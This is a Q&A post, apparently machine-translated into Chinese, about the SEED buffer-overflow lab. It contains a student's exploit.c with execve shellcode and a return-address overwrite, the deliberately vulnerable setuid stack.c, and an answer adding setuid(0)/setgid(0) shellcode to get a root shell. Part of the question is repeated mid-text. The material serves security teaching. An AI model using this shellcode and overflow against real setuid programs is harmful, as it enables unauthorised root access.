无法在缓冲区溢出分配上获取根Shell

我正在执行一个任务（请参阅http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/），当我运行./stack时，我得到的是Trace/breakpoint trap而不是根shell。以下是我的exploit.c（创建badfile）和stack.c（在其中读取badfile并使用strcpy将其复制到一个不足以处理它的缓冲区中）的代码。

exploit.c

/* exploit.c */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"          /* xorl         %eax,%eax               */
    "\x50"              /* pushl        %eax                    */
    "\x68""//sh"        /* pushl        $0x68732f2f             */
    "\x68""/bin"        /* pushl        $0x6e69622f             */
    "\x89\xe3"          /* movl         %esp,%ebx               */
    "\x50"              /* pushl        %eax                    */
    "\x53"              /* pushl        %ebx                    */
    "\x89\xe1"          /* movl         %esp,%ecx               */
    "\x99"              /* cdq                                  */
    "\xb0\x0b"          /* movb         $0x0b,%al               */
    "\xcd\x80"          /* int          $0x80                   */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    memset(buffer + 39, 0xbf, 1);
    memset(buffer + 38, 0xff, 1);
    memset(buffer + 37, 0xf1, 1);
    memset(buffer + 36, 0x40, 1);
    strcpy(buffer + 492, shellcode); 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
stack.c

/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[24];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

我编译了stack.c并将权限设置为root，并带有]
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c
root:/home/seed# chown root stack
root:/home/seed# chmod 4755 stack
我以我自己（种子）的身份编译exploit.c并>]
seed:~$ gcc -g -o exploit exploit.c
我运行./exploit创建badfile，但未收到任何错误。我运行./stack并得到Trace/breakpoint trap。 
如果运行gdb stack，我将获得外壳程序，但它不是根外壳程序。 
gdb-peda$ run
Starting program: /home/seed/stack
process 24232 is executing new program: /bin/dash
$
如果我运行seed:~$ ./stack -D_FORTIFY_SOURCE=0，我将获得外壳程序，但再次不是root用户。
seed:~$ ./stack -D_FORTIFY_SOURCE=0
$ id
uid=1000(seed) gid=1000(seed)
$
所以，我需要更改以获得root shell？ 
我正在分配作业（请参阅http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/），当我运行./stack时，我得到Trace / breakpoint陷阱而不是根外壳。 ...

char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"  // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"  // setgid(0);
"\x31\xc0"          /* xorl         %eax,%eax               */
"\x50"              /* pushl        %eax                    */
"\x68""//sh"        /* pushl        $0x68732f2f             */
"\x68""/bin"        /* pushl        $0x6e69622f             */
"\x89\xe3"          /* movl         %esp,%ebx               */
"\x50"              /* pushl        %eax                    */
"\x53"              /* pushl        %ebx                    */
"\x89\xe1"          /* movl         %esp,%ecx               */
"\x99"              /* cdq                                  */
"\xb0\x0b"          /* movb         $0x0b,%al               */
"\xcd\x80"          /* int          $0x80                   */
;
当然，将所有者更改为root